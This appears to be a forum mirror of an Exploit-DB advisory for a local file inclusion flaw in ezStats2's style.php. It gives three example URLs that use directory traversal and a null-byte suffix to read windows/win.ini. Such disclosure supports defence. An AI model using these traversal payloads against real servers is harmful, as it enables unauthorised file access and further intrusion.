- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 38294
- Проверка EDB
-
- Пройдено
- Автор
- L0N3LY-H34RT
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2013-02-06
ezStats2 - 'style.php' Local File Inclusion
Код:
source: https://www.securityfocus.com/bid/57757/info
ezStats2 is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability using directory-traversal strings to view files and execute local scripts in the context of the web server process. This may aid in further attacks.
http://www.example.com/ezStats2_mohw/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg
http://www.example.com/ezServer/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg
http://www.example.com/ezStats2_psn/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg
- Источник
- www.exploit-db.com